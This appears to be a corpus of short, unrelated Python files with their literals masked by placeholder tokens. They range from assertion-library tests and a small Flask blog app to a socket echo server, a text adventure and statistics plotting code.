fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_lower_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . is_lower ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_lower_empty_value_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_lower ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_upper ( self ) : <EOL> assert_that ( '<STR_LIT>' ) . is_upper ( ) <EOL> assert_that ( '<STR_LIT>' ) . is_upper ( ) <EOL> assert_that ( '<STR_LIT>' ) . is_upper ( ) <EOL> def test_is_upper_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_upper ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_upper_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . is_upper ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_upper_empty_value_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_upper ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_unicode ( self ) : <EOL> assert_that ( unicode ( '<STR_LIT>' ) ) . is_unicode ( ) <EOL> assert_that ( unicode ( '<STR_LIT>' ) ) . is_unicode ( ) <EOL> assert_that ( unicode ( '<STR_LIT>' ) ) . is_unicode ( ) <EOL> def test_is_unicode_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . is_unicode ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_chaining ( self ) : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_type_of ( str ) . is_length ( <NUM_LIT:3> ) . contains ( '<STR_LIT:f>' ) . does_not_contain ( '<STR_LIT:x>' ) <EOL> assert_that ( '<STR_LIT>' ) . starts_with ( '<STR_LIT:f>' ) . ends_with ( '<STR_LIT:d>' ) . matches ( '<STR_LIT>' ) . does_not_match ( '<STR_LIT>' ) </s>
<s> import sys <EOL> import numpy <EOL> from threshold_finder import Threshold_Finder <EOL> class Average_Threshold_Finder ( object ) : <EOL> def get_average_noise_threshold ( self , file_with_samples , no_of_samples ) : <EOL> with open ( file_with_samples ) as f : <EOL> samples = [ line [ : - <NUM_LIT:1> ] for line in f ] <EOL> noise_spectra = [ ] <EOL> avg_noise_powers = [ ] <EOL> for i in range ( <NUM_LIT:0> , int ( no_of_samples ) , <NUM_LIT:4> ) : <EOL> chord = samples [ i ] <EOL> first = samples [ i + <NUM_LIT:1> ] <EOL> second = samples [ i + <NUM_LIT:2> ] <EOL> third = samples [ i + <NUM_LIT:3> ] <EOL> t_finder = Threshold_Finder ( chord , first , second , third ) <EOL> coefficients , residual , average_noise_power = t_finder . find_least_squares ( ) <EOL> noise = residual ** <NUM_LIT:2> <EOL> noise_spectra . append ( noise ) <EOL> avg_noise_powers . append ( average_noise_power ) <EOL> average_noise = numpy . mean ( noise_spectra ) <EOL> sd_noise = numpy . std ( noise_spectra ) <EOL> avg_power = numpy . mean ( avg_noise_powers ) <EOL> sd_power = numpy . std ( avg_noise_powers ) <EOL> return ( average_noise , sd_noise , avg_power , sd_power ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> file_with_samples = sys . argv [ <NUM_LIT:1> ] <EOL> no_of_samples = sys . argv [ <NUM_LIT:2> ] <EOL> threshold_finder = Average_Threshold_Finder ( ) <EOL> average_noise , sd_noise , avg_power , sd_power = threshold_finder . get_average_noise_threshold ( file_with_samples , no_of_samples ) <EOL> print average_noise <EOL> print sd_noise <EOL> print avg_power <EOL> print sd_power </s>
<s> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from agnez import embedding2d , embedding2dplot , timeseries2d , timeseries2dplot <EOL> def test_embedding2d ( ) : <EOL> data = np . random . normal ( <NUM_LIT:0> , <NUM_LIT:1> , ( <NUM_LIT:5> , <NUM_LIT:8> ) ) <EOL> labels = np . arange ( <NUM_LIT:5> ) <EOL> ebd , mtd = embedding2d ( data ) <EOL> assert ebd . shape == ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> fig , ax , sc , txts = embedding2dplot ( ebd , labels ) <EOL> assert isinstance ( fig , plt . Figure ) <EOL> def test_timesseries2d ( ) : <EOL> data = np . random . normal ( <NUM_LIT:0> , <NUM_LIT:1> , ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:8> ) ) <EOL> labels = np . arange ( <NUM_LIT:5> ) <EOL> ebd , mtd = timeseries2d ( data ) <EOL> assert ebd . shape == ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> fig , ax , sc , txts = timeseries2dplot ( ebd , labels ) <EOL> assert isinstance ( fig , plt . Figure ) </s>
<s> from _simple_example import ffi <EOL> lib = ffi . dlopen ( None ) <EOL> lib . printf ( b"<STR_LIT>" , ffi . cast ( "<STR_LIT:int>" , <NUM_LIT:2> ) ) </s>
<s> from dnslib import * <EOL> q = DNSRecord ( q = DNSQuestion ( "<STR_LIT>" , QTYPE . ANY ) ) <EOL> a = q . reply ( ) <EOL> a . add_answer ( RR ( "<STR_LIT>" , QTYPE . A , rdata = A ( "<STR_LIT>" ) , ttl = <NUM_LIT> ) ) <EOL> print str ( DNSRecord . parse ( a . pack ( ) ) ) == str ( a ) <EOL> print a <EOL> a . add_answer ( RR ( "<STR_LIT>" , QTYPE . A , rdata = A ( "<STR_LIT>" ) ) ) <EOL> a . add_answer ( RR ( "<STR_LIT>" , QTYPE . AAAA , rdata = AAAA ( "<STR_LIT>" ) ) ) <EOL> print str ( DNSRecord . parse ( a . pack ( ) ) ) == str ( a ) <EOL> print a </s>
<s> from flask_table import Table , Col <EOL> class ItemTable ( Table ) : <EOL> name = Col ( '<STR_LIT:Name>' ) <EOL> description = Col ( '<STR_LIT>' ) <EOL> class Item ( object ) : <EOL> def __init__ ( self , name , description ) : <EOL> self . name = name <EOL> self . description = description <EOL> items = [ Item ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> table = ItemTable ( items ) <EOL> print ( table . __html__ ( ) ) </s>
<s> from . account import * </s>
<s> from flask import Flask , request , session , g , redirect , url_for , abort , render_template , flash , jsonify <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> import os <EOL> basedir = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> DATABASE = '<STR_LIT>' <EOL> DEBUG = True <EOL> SECRET_KEY = '<STR_LIT>' <EOL> USERNAME = '<STR_LIT>' <EOL> PASSWORD = '<STR_LIT>' <EOL> DATABASE_PATH = os . path . join ( basedir , DATABASE ) <EOL> SQLALCHEMY_DATABASE_URI = '<STR_LIT>' + DATABASE_PATH <EOL> app = Flask ( __name__ ) <EOL> app . config . from_object ( __name__ ) <EOL> db = SQLAlchemy ( app ) <EOL> import models <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> entries = db . session . query ( models . Flaskr ) <EOL> return render_template ( '<STR_LIT>' , entries = entries ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> def add_entry ( ) : <EOL> """<STR_LIT>""" <EOL> if not session . get ( '<STR_LIT>' ) : <EOL> abort ( <NUM_LIT> ) <EOL> new_entry = models . Flaskr ( request . form [ '<STR_LIT:title>' ] , request . form [ '<STR_LIT:text>' ] ) <EOL> db . session . add ( new_entry ) <EOL> db . session . commit ( ) <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT:index>' ) ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def login ( ) : <EOL> """<STR_LIT>""" <EOL> error = None <EOL> if request . method == '<STR_LIT:POST>' : <EOL> if request . form [ '<STR_LIT:username>' ] != app . config [ '<STR_LIT>' ] : <EOL> error = '<STR_LIT>' <EOL> elif request . form [ '<STR_LIT:password>' ] != app . config [ '<STR_LIT>' ] : <EOL> error = '<STR_LIT>' <EOL> else : <EOL> session [ '<STR_LIT>' ] = True <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT:index>' ) ) <EOL> return render_template ( '<STR_LIT>' , error = error ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def logout ( ) : <EOL> """<STR_LIT>""" <EOL> session . pop ( '<STR_LIT>' , None ) <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT:index>' ) ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> def delete_entry ( post_id ) : <EOL> """<STR_LIT>""" <EOL> result = { '<STR_LIT:status>' : <NUM_LIT:0> , '<STR_LIT:message>' : '<STR_LIT>' } <EOL> try : <EOL> new_id = post_id <EOL> db . session . query ( models . Flaskr ) . filter_by ( post_id = new_id ) . delete ( ) <EOL> db . session . commit ( ) <EOL> result = { '<STR_LIT:status>' : <NUM_LIT:1> , '<STR_LIT:message>' : "<STR_LIT>" } <EOL> flash ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> result = { '<STR_LIT:status>' : <NUM_LIT:0> , '<STR_LIT:message>' : repr ( e ) } <EOL> return jsonify ( result ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import hashlib <EOL> lorem = '''<STR_LIT>''' </s>
<s> print ( "<STR_LIT>" ) <EOL> print "<STR_LIT>" <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) </s>
<s> from sys import exit <EOL> def gold_room ( ) : <EOL> print "<STR_LIT>" <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if "<STR_LIT:0>" in choice or "<STR_LIT:1>" in choice : <EOL> how_much = int ( choice ) <EOL> else : <EOL> dead ( "<STR_LIT>" ) <EOL> if how_much < <NUM_LIT:50> : <EOL> print "<STR_LIT>" <EOL> exit ( <NUM_LIT:0> ) <EOL> else : <EOL> dead ( "<STR_LIT>" ) <EOL> def bear_room ( ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> bear_moved = False <EOL> while True : <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if choice == "<STR_LIT>" : <EOL> dead ( "<STR_LIT>" ) <EOL> elif choice == "<STR_LIT>" and not bear_moved : <EOL> print "<STR_LIT>" <EOL> bear_moved = True <EOL> elif choice == "<STR_LIT>" and bear_moved : <EOL> dead ( "<STR_LIT>" ) <EOL> elif choice == "<STR_LIT>" and bear_moved : <EOL> gold_room ( ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> def cthulhu_room ( ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if "<STR_LIT>" in choice : <EOL> start ( ) <EOL> elif "<STR_LIT>" in choice : <EOL> dead ( "<STR_LIT>" ) <EOL> else : <EOL> cthulhu_room ( ) <EOL> def dead ( why ) : <EOL> print why , "<STR_LIT>" <EOL> exit ( <NUM_LIT:0> ) <EOL> def start ( ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if choice == "<STR_LIT:left>" : <EOL> bear_room ( ) <EOL> elif choice == "<STR_LIT:right>" : <EOL> cthulhu_room ( ) <EOL> else : <EOL> dead ( "<STR_LIT>" ) <EOL> start ( ) </s>
<s> import select <EOL> import socket <EOL> import sys <EOL> import Queue <EOL> server = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> server . setblocking ( <NUM_LIT:0> ) <EOL> server_address = ( '<STR_LIT:localhost>' , <NUM_LIT> ) <EOL> print >> sys . stderr , '<STR_LIT>' % server_address <EOL> server . bind ( server_address ) <EOL> server . listen ( <NUM_LIT:5> ) <EOL> inputs = [ server ] <EOL> outputs = [ ] <EOL> message_queues = { } <EOL> while inputs : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> timeout = <NUM_LIT:1> <EOL> readable , writable , exceptional = select . select ( inputs , outputs , inputs , timeout ) <EOL> if not ( readable or writable or exceptional ) : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> continue <EOL> for s in readable : <EOL> if s is server : <EOL> connection , client_address = s . accept ( ) <EOL> print >> sys . stderr , '<STR_LIT>' , client_address <EOL> connection . setblocking ( <NUM_LIT:0> ) <EOL> inputs . append ( connection ) <EOL> message_queues [ connection ] = Queue . Queue ( ) <EOL> else : <EOL> data = s . recv ( <NUM_LIT> ) <EOL> if data : <EOL> print >> sys . stderr , '<STR_LIT>' % ( data , s . getpeername ( ) ) <EOL> message_queues [ s ] . put ( data ) <EOL> if s not in outputs : <EOL> outputs . append ( s ) <EOL> else : <EOL> print >> sys . stderr , '<STR_LIT>' , client_address , '<STR_LIT>' <EOL> if s in outputs : <EOL> outputs . remove ( s ) <EOL> inputs . remove ( s ) <EOL> s . close ( ) <EOL> del message_queues [ s ] <EOL> for s in writable : <EOL> try : <EOL> next_msg = message_queues [ s ] . get_nowait ( ) <EOL> except Queue . Empty : <EOL> print >> sys . stderr , '<STR_LIT>' , s . getpeername ( ) , '<STR_LIT>' <EOL> outputs . remove ( s ) <EOL> else : <EOL> print >> sys . stderr , '<STR_LIT>' % ( next_msg , s . getpeername ( ) ) <EOL> s . send ( next_msg ) <EOL> for s in exceptional : <EOL> print >> sys . stderr , '<STR_LIT>' , s . getpeername ( ) <EOL> inputs . remove ( s ) <EOL> if s in outputs : <EOL> outputs . remove ( s ) <EOL> s . close ( ) <EOL> del message_queues [ s ] </s>
<s> from threading import Timer <EOL> def delayed ( seconds ) : <EOL> def decorator ( f ) : <EOL> def wrapper ( * args , ** kargs ) : <EOL> t = Timer ( seconds , f , args , kargs ) <EOL> t . start ( ) <EOL> return wrapper <EOL> return decorator <EOL> @ delayed ( <NUM_LIT:3> ) <EOL> def timer_print ( ) : <EOL> print "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> timer_print ( ) </s>
<s> """<STR_LIT>""" <EOL> import os . path <EOL> for path in [ '<STR_LIT>' , '<STR_LIT:filename>' , '<STR_LIT>' , '<STR_LIT:/>' , '<STR_LIT>' ] : <EOL> print '<STR_LIT>' % path , os . path . splitext ( path ) </s>
<s> import pyglet <EOL> import physicalobject , resources <EOL> class Bullet ( physicalobject . PhysicalObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( Bullet , self ) . __init__ ( resources . bullet_image , * args , ** kwargs ) <EOL> pyglet . clock . schedule_once ( self . die , <NUM_LIT:0.5> ) <EOL> self . is_bullet = True <EOL> def die ( self , dt ) : <EOL> self . dead = True </s>
<s> def test ( a , b = <NUM_LIT:50> , c = <NUM_LIT> ) : <EOL> print '<STR_LIT>' % ( a , b , c ) <EOL> test ( <NUM_LIT:1> ) <EOL> test ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> test ( <NUM_LIT:1> , c = <NUM_LIT:10> ) </s>
<s> '''<STR_LIT>''' <EOL> def multiply ( a , b ) : <EOL> """<STR_LIT>""" <EOL> return a * b </s>
<s> import time <EOL> from tqdm import * <EOL> for i in tqdm ( range ( <NUM_LIT:100> ) , desc = "<STR_LIT>" , leave = True ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> for i in trange ( <NUM_LIT:100> ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> for i in tqdm ( xrange ( <NUM_LIT:100> ) ) : <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> import wtforms_json <EOL> from wtforms import Form <EOL> from wtforms . fields import BooleanField , StringField <EOL> wtforms_json . init ( ) <EOL> class LocationForm ( Form ) : <EOL> name = StringField ( ) <EOL> address = StringField ( ) <EOL> class EventForm ( Form ) : <EOL> name = StringField ( ) <EOL> is_public = BooleanField ( ) <EOL> json = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:location>' : { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> } <EOL> form = EventForm . from_json ( json ) <EOL> print ( form . data ) <EOL> print ( form . patch_data ) </s>
<s> """<STR_LIT>""" <EOL> class Command ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , args ) : <EOL> self . args = args <EOL> def execute_command ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError </s>
<s> from setuptools import setup <EOL> try : <EOL> with open ( '<STR_LIT>' ) as f : <EOL> long_description = f . read ( ) <EOL> except IOError : <EOL> with open ( '<STR_LIT>' ) as f : <EOL> long_description = f . read ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import datetime <EOL> from django . conf import settings <EOL> from django . contrib import messages <EOL> from django . contrib . auth import authenticate <EOL> from django . contrib . auth . models import AnonymousUser , User <EOL> from django . contrib . messages . storage import default_storage <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import Client , TestCase <EOL> from django . test . utils import override_settings <EOL> from . import PERSISTENT_MESSAGE_LEVELS , WARNING_PERSISTENT <EOL> from . models import Message <EOL> class MessagesClient ( Client ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** defaults ) : <EOL> """<STR_LIT>""" <EOL> super ( MessagesClient , self ) . __init__ ( ** defaults ) <EOL> if '<STR_LIT>' in settings . INSTALLED_APPS : <EOL> self . _messages = default_storage ( self ) <EOL> def login ( self , ** credentials ) : <EOL> """<STR_LIT>""" <EOL> if super ( MessagesClient , self ) . login ( ** credentials ) : <EOL> self . user = authenticate ( ** credentials ) <EOL> return True <EOL> else : <EOL> self . user = AnonymousUser ( ) <EOL> return False <EOL> def logout ( self ) : <EOL> logout = super ( MessagesClient , self ) . logout ( ) <EOL> if hasattr ( self , '<STR_LIT:user>' ) : <EOL> self . user = None <EOL> return logout <EOL> class MessagesTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> client_class = MessagesClient <EOL> def _get_user ( self , username = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> user = User . objects . create ( username = username ) <EOL> user . set_password ( '<STR_LIT:password>' ) <EOL> user . save ( ) <EOL> return user <EOL> @ override_settings ( MESSAGE_LEVEL = <NUM_LIT:1> ) <EOL> def test_persist_message_levels ( self ) : <EOL> """<STR_LIT>""" <EOL> user = self . _get_user ( ) <EOL> self . client . login ( username = user . username , password = '<STR_LIT:password>' ) <EOL> for level in PERSISTENT_MESSAGE_LEVELS : <EOL> msg = '<STR_LIT>' . format ( level , datetime . datetime . now ( ) ) <EOL> messages . add_message ( self . client , level , msg ) <EOL> result = Message . objects . get ( level = level ) <EOL> self . assertEqual ( result . message , msg ) <EOL> self . assertEqual ( result . user , user ) <EOL> self . assertEqual ( result . extra_tags , u'<STR_LIT>' ) <EOL> self . assertIsNone ( result . expires ) <EOL> self . assertIsNotNone ( result . created ) <EOL> self . assertFalse ( result . read ) <EOL> def test_mark_as_read ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = self . _get_user ( ) . username , password = '<STR_LIT:password>' ) <EOL> messages . add_message ( self . client , WARNING_PERSISTENT , "<STR_LIT>" ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertFalse ( result . read ) <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : result . id } ) <EOL> self . client . get ( url ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( result . read ) <EOL> def test_for_other_user ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = self . _get_user ( ) . username , password = '<STR_LIT:password>' ) <EOL> user2 = self . _get_user ( username = "<STR_LIT>" ) <EOL> messages . add_message ( self . client , WARNING_PERSISTENT , "<STR_LIT>" , user = user2 ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( result . user , user2 ) <EOL> def test_mark_message_read_for_other_user ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = self . _get_user ( ) . username , password = '<STR_LIT:password>' ) <EOL> user2 = self . _get_user ( username = "<STR_LIT>" ) <EOL> messages . add_message ( self . client , WARNING_PERSISTENT , "<STR_LIT>" , user = user2 ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( result . user , user2 ) <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : result . id } ) <EOL> self . client . get ( url ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertFalse ( result . read ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import math <EOL> import numpy as np <EOL> import pandas <EOL> import nsfg <EOL> import thinkplot <EOL> import thinkstats2 <EOL> def ParetoMedian ( xmin , alpha ) : <EOL> """<STR_LIT>""" <EOL> return xmin * pow ( <NUM_LIT:2> , <NUM_LIT:1> / alpha ) <EOL> def MakeExpoCdf ( ) : <EOL> """<STR_LIT>""" <EOL> thinkplot . PrePlot ( <NUM_LIT:3> ) <EOL> for lam in [ <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0.5> ] : <EOL> xs , ps = thinkstats2 . RenderExpoCdf ( lam , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:50> ) <EOL> label = r'<STR_LIT>' % lam <EOL> thinkplot . Plot ( xs , ps , label = label ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT:x>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def ReadBabyBoom ( filename = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> var_info = [ <EOL> ( '<STR_LIT:time>' , <NUM_LIT:1> , <NUM_LIT:8> , int ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:9> , <NUM_LIT:16> , int ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , int ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT:32> , int ) , <EOL> ] <EOL> columns = [ '<STR_LIT:name>' , '<STR_LIT:start>' , '<STR_LIT:end>' , '<STR_LIT:type>' ] <EOL> variables = pandas . DataFrame ( var_info , columns = columns ) <EOL> variables . end += <NUM_LIT:1> <EOL> dct = thinkstats2 . FixedWidthVariables ( variables , index_base = <NUM_LIT:1> ) <EOL> df = dct . ReadFixedWidth ( filename , skiprows = <NUM_LIT> ) <EOL> return df <EOL> def MakeBabyBoom ( ) : <EOL> """<STR_LIT>""" <EOL> df = ReadBabyBoom ( ) <EOL> diffs = df . minutes . diff ( ) <EOL> cdf = thinkstats2 . Cdf ( diffs , label = '<STR_LIT>' ) <EOL> thinkplot . PrePlot ( cols = <NUM_LIT:2> ) <EOL> thinkplot . Cdf ( cdf ) <EOL> thinkplot . Config ( xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' , <EOL> legend = False ) <EOL> thinkplot . SubPlot ( <NUM_LIT:2> ) <EOL> thinkplot . Cdf ( cdf , complement = True ) <EOL> thinkplot . Config ( xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' , <EOL> yscale = '<STR_LIT>' , <EOL> legend = False ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> legend = False ) <EOL> def MakeParetoCdf ( ) : <EOL> """<STR_LIT>""" <EOL> xmin = <NUM_LIT:0.5> <EOL> thinkplot . PrePlot ( <NUM_LIT:3> ) <EOL> for alpha in [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.5> ] : <EOL> xs , ps = thinkstats2 . RenderParetoCdf ( xmin , alpha , <NUM_LIT:0> , <NUM_LIT> , n = <NUM_LIT:100> ) <EOL> thinkplot . Plot ( xs , ps , label = r'<STR_LIT>' % alpha ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT:x>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def MakeParetoCdf2 ( ) : <EOL> """<STR_LIT>""" <EOL> xmin = <NUM_LIT:100> <EOL> alpha = <NUM_LIT> <EOL> xs , ps = thinkstats2 . RenderParetoCdf ( xmin , alpha , <NUM_LIT:0> , <NUM_LIT> , n = <NUM_LIT:100> ) <EOL> thinkplot . Plot ( xs , ps ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' , <EOL> legend = False ) <EOL> def MakeNormalCdf ( ) : <EOL> """<STR_LIT>""" <EOL> thinkplot . PrePlot ( <NUM_LIT:3> ) <EOL> mus = [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ] <EOL> sigmas = [ <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] <EOL> for mu , sigma in zip ( mus , sigmas ) : <EOL> xs , ps = thinkstats2 . RenderNormalCdf ( mu = mu , sigma = sigma , <EOL> low = - <NUM_LIT:1.0> , high = <NUM_LIT> ) <EOL> label = r'<STR_LIT>' % ( mu , sigma ) <EOL> thinkplot . Plot ( xs , ps , label = label ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT:x>' , <EOL> ylabel = '<STR_LIT>' , <EOL> loc = <NUM_LIT:2> ) <EOL> def MakeNormalModel ( weights ) : <EOL> """<STR_LIT>""" <EOL> mu , var = thinkstats2 . TrimmedMeanVar ( weights , p = <NUM_LIT> ) <EOL> print ( '<STR_LIT>' , mu , var ) <EOL> sigma = math . sqrt ( var ) <EOL> print ( '<STR_LIT>' , sigma ) <EOL> xs , ps = thinkstats2 . RenderNormalCdf ( mu , sigma , low = <NUM_LIT:0> , high = <NUM_LIT> ) <EOL> thinkplot . Plot ( xs , ps , label = '<STR_LIT>' , color = '<STR_LIT>' ) <EOL> cdf = thinkstats2 . Cdf ( weights , label = '<STR_LIT:data>' ) <EOL> thinkplot . PrePlot ( <NUM_LIT:1> ) <EOL> thinkplot . Cdf ( cdf ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def MakeExampleNormalPlot ( ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:1000> <EOL> thinkplot . PrePlot ( <NUM_LIT:3> ) <EOL> mus = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> ] <EOL> sigmas = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> for mu , sigma in zip ( mus , sigmas ) : <EOL> sample = np . random . normal ( mu , sigma , n ) <EOL> xs , ys = thinkstats2 . NormalProbability ( sample ) <EOL> label = '<STR_LIT>' % ( mu , sigma ) <EOL> thinkplot . Plot ( xs , ys , label = label ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def MakeNormalPlot ( weights , term_weights ) : <EOL> """<STR_LIT>""" <EOL> mean , var = thinkstats2 . TrimmedMeanVar ( weights , p = <NUM_LIT> ) <EOL> std = math . sqrt ( var ) <EOL> xs = [ - <NUM_LIT:4> , <NUM_LIT:4> ] <EOL> fxs , fys = thinkstats2 . FitLine ( xs , mean , std ) <EOL> thinkplot . Plot ( fxs , fys , linewidth = <NUM_LIT:4> , color = '<STR_LIT>' ) <EOL> 